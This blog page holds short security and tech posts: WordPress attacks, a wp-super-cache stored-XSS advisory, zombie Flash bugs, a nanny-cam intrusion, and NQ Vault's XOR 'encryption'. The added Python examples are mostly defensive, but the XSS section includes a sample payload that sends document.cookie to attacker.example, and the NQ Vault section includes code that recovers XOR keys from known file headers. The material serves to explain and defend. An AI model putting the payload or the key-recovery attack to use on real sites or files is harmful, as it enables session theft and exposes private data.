
Joe Dog Software

Proudly serving the Internets since 1999

Block IP Addresses With, um, block

Last night we told you that ISIS assholes were attacking America and its WordPress blogs. Have no fear, kids. In the War Against Internet Dickbags, Your JoeDog is here to help. Whenever he’s attacked by these people, i.e., all the time, he grabs their IP addresses from the logs and blocks their asses. He feeds those addresses to a script called block which, um, blocks them.

The script is just a convenience which makes your life easier. iptables does the heavy lifting. If you’re running a Linux system — and why aren’t you? — then you probably have iptables.

Let’s block some dickwads now! (Continued after the jump)
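Here is the log-to-firewall workflow the post describes, as an added example. This is not the block script from the post; it is a stand-alone Python version that reads an Apache-style access log, counts failed wp-login.php POSTs per address, and emits one iptables DROP rule per offender. The log lines are constructed (RFC 5737 documentation addresses, not real traffic), the threshold of 3 is arbitrary, and the allow-list is an assumption added so a bad log line can never lock the operator out.

```python
# Added example (not the 'block' script from the post): pull repeat wp-login.php
# hammerers out of an Apache-style access log and turn them into iptables rules.
import ipaddress
import re
from collections import Counter
from typing import Iterable, List

# ip ident user [time] "METHOD path proto" status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log (not real traffic; RFC 5737 documentation addresses).
# The 127.0.0.1 lines stand in for a local monitoring probe that also posts to the form.
SAMPLE_LOG = """
203.0.113.5 - - [10/Apr/2015:01:02:03 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
203.0.113.5 - - [10/Apr/2015:01:02:04 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
203.0.113.5 - - [10/Apr/2015:01:02:05 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
198.51.100.9 - - [10/Apr/2015:01:03:00 -0400] "GET /index.php HTTP/1.1" 200 8765
198.51.100.9 - - [10/Apr/2015:01:03:01 -0400] "POST /wp-login.php HTTP/1.1" 302 0
192.0.2.77 - - [10/Apr/2015:01:04:00 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
192.0.2.77 - - [10/Apr/2015:01:04:01 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
192.0.2.77 - - [10/Apr/2015:01:04:02 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
192.0.2.77 - - [10/Apr/2015:01:04:03 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
127.0.0.1 - - [10/Apr/2015:01:05:00 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
127.0.0.1 - - [10/Apr/2015:01:05:01 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
127.0.0.1 - - [10/Apr/2015:01:05:02 -0400] "POST /wp-login.php HTTP/1.1" 200 3456
""".strip().splitlines()


def login_failures(lines: Iterable[str]) -> Counter:
    """Count failed login POSTs per source address.
    WordPress re-renders the form with a 200 on a failed login and answers a
    successful one with a 302 redirect, so only 200s count as failures."""
    hits: Counter = Counter()
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m.groups()
        if method == "POST" and path.startswith("/wp-login.php") and status == "200":
            hits[ip] += 1
    return hits


def offenders(lines: Iterable[str], threshold: int) -> List[str]:
    """Addresses with at least `threshold` failed logins, sorted for stable output."""
    return sorted(ip for ip, n in login_failures(lines).items() if n >= threshold)


def block_rules(addrs: Iterable[str], allow: Iterable[str] = ("127.0.0.1",)) -> List[str]:
    """One DROP rule per address. Malformed strings are skipped (never feed garbage
    to iptables) and allow-listed addresses are skipped so you cannot block yourself.
    IPv6 addresses get ip6tables, which is a separate table from iptables."""
    allowed = set(allow)
    rules = []
    for a in addrs:
        try:
            ip = ipaddress.ip_address(a)
        except ValueError:
            continue
        if str(ip) in allowed:
            continue
        tool = "ip6tables" if ip.version == 6 else "iptables"
        rules.append(f"{tool} -I INPUT -s {ip} -j DROP")
    return rules


if __name__ == "__main__":
    # Dry run: print the rules. Pipe the output into 'sudo sh' to apply them.
    for rule in block_rules(offenders(SAMPLE_LOG, 3)):
        print(rule)
```

Put your own address (and your monitoring hosts) in the allow-list before you ever run this against a live log. One rule per address is fine for a few dozen offenders; once the list grows into the thousands, keep the addresses in an ipset and match the set with a single iptables rule instead of walking a long chain on every packet.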




ISIS Unleashes Its Skiddies

The FBI released a Public Service Announcement, you guys. According to the bulletin, ISIS skiddies have started attacking WordPress installations. They’re trying to exploit known vulnerabilities in an attempt to grab your personal and financial information.

Well, tell them to join the fscking club.

This site has been attacked so many times, that we’ve applied for Veterans’ benefits. Without checking the logs, we can confidently say that some asshole’s attacking it now. Why can we confidently say that? Because some asshole’s always attacking it!

The most frequent assault is a dictionary login attack. They pound the login page with an endless stream of login attempts. Here’s how we thwarted that one.

Your best defense against these dicks is to keep your software up-to-date. If you operate in a specific region, you could always firewall off large parts of the globe. If we blocked Asia, we’d reduce attacks by over 50%. Don’t worry, Asia. We love you. But please get your software up-to-date.



WordPress Vulnerability: wp-super-cache

Whenever someone says “PHP sucks!” Your JoeDog assumes they got that impression from WordPress. It uses inline programming tags that mix logic with content. Whenever you do that, the result is always a nice heaping mound of spaghetti code.

PHP doesn’t have to be coded this way. There are plenty of nice frameworks which support model-view-controller. Your JoeDog uses WordPress because he likes it as a blogging platform. He blogs on this site more often than he codes it; a cost-benefit analysis leads him to WordPress.

He also opens himself to vulnerabilities. Oh, look! Here’s another one now: Persistent XSS in WP-Super-Cache. Your JoeDog uses that module. What’s wrong with it?

Using this vulnerability, an attacker using a carefully crafted query could insert malicious scripts into the plugin’s cached file listing page. As this page requires a valid nonce in order to be displayed, a successful exploitation would require the site’s administrator to have a look at that particular section, manually.

Fortunately, the fix is already out. If you’re also using wp-super-cache, make sure you’re running version 1.4.4 or later. This is a dangerous vulnerability: the payload is stored, so it fires with the administrator’s privileges the moment an admin opens the cached-file listing. Get up to date or get out of the game.

NOTE: Your JoeDog considers PHP a rather elegant language. It’s the many bad implementations and design decisions that make it seem like Suck.
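The stored-XSS pattern the advisory describes, in miniature, as an added example. This is not WP-Super-Cache or WordPress code; it is a small Python model written for this page. It assumes the listing page names each cached entry after the path and query of the request that produced it, so an attacker’s crafted request lands, as text, in a page only an administrator can open. The URLs are constructed and the hostnames are placeholders.

```python
# Added example (not WP-Super-Cache or WordPress code): a cache listing that
# interpolates attacker-controlled request strings, beside the escaped version.
# Assumption: entries are named after the request path and query (hypothetical).
import html
from typing import List
from urllib.parse import urlsplit


def cache_entry_name(url: str) -> str:
    """Name a cache entry after the path and query of the request that filled it."""
    parts = urlsplit(url)
    return parts.path + ("?" + parts.query if parts.query else "")


def render_listing_vulnerable(entries: List[str]) -> str:
    # Raw interpolation: whatever the attacker put in the request is now live HTML,
    # executed in the administrator's browser with the administrator's session.
    return "<ul>" + "".join(f"<li>{e}</li>" for e in entries) + "</ul>"


def render_listing_fixed(entries: List[str]) -> str:
    # html.escape() turns < > & " ' into entities, so the browser displays the entry
    # as text instead of parsing it as markup. Escape at output time, every time.
    return "<ul>" + "".join(f"<li>{html.escape(e, quote=True)}</li>" for e in entries) + "</ul>"


def contains_live_script(markup: str) -> bool:
    """Crude check, used only to show the difference between the two renderers."""
    return "<script" in markup.lower()


# Constructed requests (not a real exploit): one ordinary page view, one poisoned query.
BENIGN_URL = "http://blog.example/2015/04/some-post/"
EVIL_URL = ("http://blog.example/?s=<script>new Image().src="
            "'http://attacker.example/?c='%2Bdocument.cookie</script>")

CACHE_INDEX = [cache_entry_name(BENIGN_URL), cache_entry_name(EVIL_URL)]

if __name__ == "__main__":
    print("vulnerable:", render_listing_vulnerable(CACHE_INDEX))
    print("fixed:     ", render_listing_fixed(CACHE_INDEX))
```

Two points worth keeping in mind. The nonce only controls who can load the page; it does nothing about what the page contains, which is why the advisory says the attack still works once an admin looks at the listing. And the fix is output encoding, not input filtering: in WordPress terms, wrap the value in esc_html() where it is printed, so an entry that slipped past every other check is still rendered as text.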



A Nerd Dream Becomes Reality

Greg Charvat has been tinkering with things his entire life. He’s well-known in the maker community where he’s published a lot of neat hacks. In his garage he builds vacuum tube audio equipment and restores antique autos. He’s also a university professor who’s written a course on building radar systems. Now comes the fun part. Greg recently combined his maker skills with his scientific knowledge to make every nerd’s wet dreams a reality. He’s developed x-ray vision!!11!1!!



I, Leg Brace

Humans have tried to improve the physicality of humans for as long as there have been humans. Our big brains often produce big ideas that our puny bodies can’t realize. We’ve made wings in failed attempts to soar. We’ve produced an endless array of footwear, body armor and extensions for our appendages to improve our physical performance. Generally these devices have failed us but sometimes — such as in the case of artificial wings — they’ve killed us.

In our quest for improved performance, physics is generally the meanie that bites our ass. In 1890, a Russian inventor patented a device to improve our ability to run, walk and jump. Unfortunately, it was too heavy and burdensome to actually enhance performance in any of those areas. “This thing sucks. Take it off.”

In 2013, a Belgian team finally produced a version of the 1890 prototype that was able to offset the burdens of its own weight and produce a net positive performance gain. That may seem like a long time but it’s only about three professional lifetimes. Now the gains keep coming.

An American team led by Steven Collins at Carnegie Mellon has developed an extremely light spring-loaded brace which boosts the performance of the calf muscles and the Achilles tendon by absorbing small amounts of energy when the foot hits the ground. The team reports a 7% performance gain.

Gregory Sawicki, one of the paper’s co-authors, put that in perspective for the Guardian. “A 7% reduction in energy cost is like taking off a 10-pound backpack, which is significant. Though it’s surprising that we were able to achieve this advantage over a system strongly shaped by evolution, this study shows that there’s still a lot to learn about human biomechanics and a seemingly simple behaviour like walking,” he said.

Not bad, humans. Not bad at all.



Zombie Bugs

From Nibble Sec we get one of those stories that makes us roll our eyes. Actually, it makes us shake our heads but Your JoeDog refuses to type ‘SMH.’ Wait a second – you just typed it! Shaddup.

A four-year-old Adobe bug (CVE-2011-2461) is back from the dead. The flaw puts Flash users at risk of having their sessions hijacked. But this bug was patched by Adobe back in November 2011 — why are we talking about it now?

Static libraries! If an app was compiled using the vulnerable SDK, then it still contains the vulnerable code unless it’s recompiled with a patched SDK.

Here’s how it works: Static libraries contain subroutines which are compiled into the executable. In this case, bad binary code was copied into the app. To fix the bug, you need to recompile the app so good code gets copied into it.

Really? Yes. Really.

“I have nothing to do today.” –Nobody in IT, ever.
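The practical consequence of the static-library explanation above is that you cannot find zombie bugs by checking which SDK is installed; you have to check the binaries that were built with it. Here is that check as an added example. This is not Nibble Sec’s scanner and not Adobe’s code; it assumes the SDK stamps a version string such as ExampleSDK/4.5.0 into everything it builds, and ExampleSDK, its version numbers and the sample binaries are all hypothetical stand-ins.

```python
# Added example (not Nibble Sec's tool, not Adobe's code): find binaries that still
# carry statically linked code from a vulnerable SDK build. Assumption: the SDK
# stamps b"ExampleSDK/<major>.<minor>.<patch>" into every binary built with it.
import re
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]
VERSION_RE = re.compile(rb"ExampleSDK/(\d+)\.(\d+)\.(\d+)")
FIXED_IN: Version = (4, 5, 1)   # hypothetical first release that ships the fix


def embedded_sdk_version(blob: bytes) -> Optional[Version]:
    """Return the SDK version baked into a binary, or None if no marker is present.
    Integer tuples compare correctly where byte-string comparison would not:
    b"4.10.0" < b"4.5.1" as bytes, but (4, 10, 0) > (4, 5, 1)."""
    m = VERSION_RE.search(blob)
    if m is None:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def is_zombie(blob: bytes) -> bool:
    """True when the binary was built against an SDK older than the fix. Updating the
    SDK on the build machine changes nothing about this file; only a rebuild does."""
    v = embedded_sdk_version(blob)
    return v is not None and v < FIXED_IN


def triage(binaries: Dict[str, bytes]) -> Dict[str, str]:
    """Classify a fleet of deployed binaries: 'rebuild', 'ok' or 'no-marker'."""
    verdicts = {}
    for name, blob in binaries.items():
        v = embedded_sdk_version(blob)
        if v is None:
            verdicts[name] = "no-marker"
        elif v < FIXED_IN:
            verdicts[name] = "rebuild"
        else:
            verdicts[name] = "ok"
    return verdicts


# Constructed sample binaries (ELF-looking filler, not real executables).
FLEET = {
    "old_app": b"\x7fELF" + b"\x00" * 12 + b"ExampleSDK/4.5.0\x00" + b"\x90" * 8,
    "new_app": b"\x7fELF" + b"\x00" * 12 + b"ExampleSDK/4.10.2\x00" + b"\x90" * 8,
    "no_sdk":  b"\x7fELF" + b"\x00" * 32,
}

if __name__ == "__main__":
    for name, verdict in triage(FLEET).items():
        print(f"{name}: {verdict}")
```

The "no-marker" bucket is the honest answer, not a clean bill of health: a library that leaves no version string behind has to be found by matching known code or data patterns from the vulnerable build instead, which is what the real scanners for this bug do. Either way the remediation is the same as the post says: rebuild, redeploy.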



Enter Sandman

Let’s face it. Online appliances are designed for the lowest common denominator. Consider an average person’s intelligence. Half of a manufacturer’s customers are dumber than that. If they lock down a device too securely, they’re just setting themselves up for a lot of service calls. We all know how manufacturers feel about service calls.

Last week a Minnesota couple got a lesson in device security. One night they were lying in bed and music started wafting into their bedroom. It appeared to come from the nursery where their infant slept. That’s odd, right? When an infant gets its hands on music it’s more likely to eat the CD than put it in a player and hit “start.”

It turns out the music was coming from the Netherlands. Wait a second – you said they lived in Minnesota! Here’s what happened: The couple entered the room to investigate. The music stopped when they opened the door. Suspecting a speaker associated with their Foscam nanny-cam, they used its software to check for web sessions. They found one associated with an IP address registered in Amsterdam. Someone from that city had attached themselves to their nanny-cam and was watching them inside their house. Creepy!

This couple wasn’t alone. They discovered private interior scenes from inside homes throughout the world. “There’s at least fifteen different countries listed and it’s not just nurseries — it’s people’s living rooms, their bedrooms, their kitchens,” she told KTTC. “Every place that people think is sacred and private in their home is being accessed.”

It’s not clear how the camera was compromised. Foscam recommends your firmware be upgraded to the latest version, so it could have been a bug. But they also recommend you change the default username and password, so it could have been user negligence. Beyond that, they recommend placing the daemon on an alternative port and checking your logs at regular intervals. Moving the port is obscurity, not security; the firmware update and the password change are the two that matter, along with not exposing the camera to the Internet at all unless you actually need to. Sounds like these things were pretty insecure….

[KTTC: Nanny-cam Hacked For World To See]

[Foscam: How To Secure Your Device]

 



You Cannot Be Serious??!!

NQ Vault is an extremely popular app. It has more than 30 million users worldwide and it’s the recipient of many great reviews on Google Play. It’s a free download and pro upgrade costs $19.99.

The app is supposed to help secure your personal data. NQ’s website refers to the mechanism that protects those files as “strong encryption.” Is it? That depends. Do you consider XOR strong encryption?

XOR is a pretty common component in complex ciphers. By itself, XOR is easy to implement and requires little processing power. With a constant repeating key it is obfuscation at best: a quaint hack with which to hide files from casual browsing. As a security hacker recently discovered, this is how NQ implements its file protection.

ninjadoge24 encrypted a small png image using NQ Vault. He then examined the file in a hex editor. To his surprise it was only partially encrypted. It struck him as a substitution pattern. A thought quickly entered his head: “What if it’s just XOR? Like just fuckin’ XOR?”

To test his hunch, he entered the hex values of the unencrypted file into a hex calculator and XORed them against a guessed key. Guess what? The result matched NQ Vault’s “encrypted” values.

Breaking XOR with a fixed, repeating key is trivial. If you visit ninjadoge24’s blog, he’ll show you how to brute force your way through it.
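Here is why it is trivial, as an added example rather than code from ninjadoge24 or NQ. It goes a step beyond brute force: every PNG begins with the same eight signature bytes, so XORing the “encrypted” header against that known plaintext hands you the key directly, for any key up to eight bytes long. The vault model is an assumption drawn from the post’s observation that the file was only partially encrypted (only the first PREFIX_LEN bytes are XORed; the length and the sample image are constructed).

```python
# Added example (not ninjadoge24's or NQ's code): repeating-key XOR over a file
# with a known header falls to a known-plaintext attack, no brute force required.
# Assumption: the vault XORs only the first PREFIX_LEN bytes, per the post's
# "only partially encrypted" observation; 128 is a hypothetical length.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"   # the first 8 bytes of every PNG file
PREFIX_LEN = 128


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("empty key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def vault_encrypt(data: bytes, key: bytes) -> bytes:
    """Toy vault: XOR the prefix, store the rest of the file untouched."""
    return xor_bytes(data[:PREFIX_LEN], key) + data[PREFIX_LEN:]


def vault_decrypt(data: bytes, key: bytes) -> bytes:
    return vault_encrypt(data, key)   # XOR is its own inverse


def recover_key(ciphertext: bytes, known_plaintext: bytes, key_len: int) -> bytes:
    """Known-plaintext attack: ciphertext[i] ^ plaintext[i] == key[i % key_len].
    Every position must agree with that period, otherwise key_len is wrong."""
    if len(known_plaintext) < key_len:
        raise ValueError("need at least key_len bytes of known plaintext")
    stream = bytes(c ^ p for c, p in zip(ciphertext, known_plaintext))
    for i, k in enumerate(stream):
        if k != stream[i % key_len]:
            raise ValueError("known plaintext does not repeat with period key_len")
    return stream[:key_len]


def brute_force_single_byte(ciphertext: bytes, known_plaintext: bytes):
    """The post's route: no math at all, 256 guesses is the hamster-wheel budget."""
    head = ciphertext[:len(known_plaintext)]
    for k in range(256):
        if xor_bytes(head, bytes([k])) == known_plaintext:
            return bytes([k])
    return None


# Constructed stand-in for a small image: a real signature followed by filler bytes.
SAMPLE_PNG = PNG_SIGNATURE + bytes(range(256)) * 2

if __name__ == "__main__":
    ct = vault_encrypt(SAMPLE_PNG, b"\x5a")
    print("recovered key:", recover_key(ct, PNG_SIGNATURE, 1).hex())
    print("tail stored in clear:", ct[PREFIX_LEN:] == SAMPLE_PNG[PREFIX_LEN:])
```

Note what the known-plaintext route buys you: it does not care how long the password was, only how long the repeating key is, and almost every file format you would put in a vault (PNG, JPEG, PDF, ZIP, Office documents) starts with a fixed signature. That is the gap between a mixing primitive like XOR and an actual cipher, where the keystream never repeats and knowing some plaintext tells you nothing about the rest.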

Honestly, this should be considered a mother fscking crime. NQ claimed this app used “strong encryption” but you could bust it with all the computing power that’s generated by a hamster wheel.



Easter Not-so-nice-time

Is Big Software cracking down on programmers who insert Easter Eggs into their code?

“Are they going away? Indeed they are,” says Dr Diomidis Spinellis, a Greek computer science academic and author of The Elements of Computing Style.

“As programming becomes more corporate, more official, one cannot appear to have code that is not officially sanctioned,” he says.

Easter eggs have not undergone the same level of scrutiny as the rest of the code, he says, and there may be vulnerabilities attached to them.

“They still happen, but they’re less likely to be little bits of code, more likely to be hidden in documentation or code comments,” adds Brendan Quinn, a software architect in London.

“Actual executable stuff hidden in code is something that people are trying to eliminate. With varied success around the industry.”

The argument goes: if a manufacturer can’t stop developers from sneaking in benign undocumented features, how can you be sure they haven’t inserted a backdoor, too?

Your JoeDog doesn’t hide Easter Eggs inside his code. It’s open source. To find them, all you’d have to do is read….

[Business Insider: Twenty-two Easter Eggs]

[BBC News: The End of the Easter Egg?]